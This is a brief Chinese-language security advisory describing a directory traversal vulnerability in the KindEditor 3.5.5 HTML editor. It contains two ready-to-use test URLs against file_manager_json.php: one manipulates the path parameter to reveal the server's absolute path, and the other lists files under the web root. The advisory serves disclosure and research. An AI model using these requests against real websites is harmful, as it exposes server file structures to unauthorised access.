KindEditor 3.5.5 遍历目录漏洞

影响版本:
KindEditor 3.5.5
漏洞描述:
KindEditor是一套开源的HTML可视化编辑器,主要用于让用户在网站上获得所见即所得编辑效果,兼容IE、Firefox、Chrome、Safari、Opera等主流浏览器

存在遍历目录漏洞
<*参考

http://hi.baidu.com/artcracker/blog/item/58c28c25827d2431d5074231.html

*>

测试方法:
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

1.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=/
//path=/,爆出绝对路径D:\AppServ\www\67cms\kindeditor\php\file_manager_json.php

2.http://localhost/67cms/kindeditor/php/file_manager_json.php?path=AppServ/www/67cms/
//根据爆出的绝对路径,修改path的值为AppServ/www/67cms/
这时将遍历d:/AppServ/www/67cms/下的所有文件和文件名
安全建议:
暂无,等待官方补丁

http://www.kindsoft.net/
发表评论?

0 条评论。

发表评论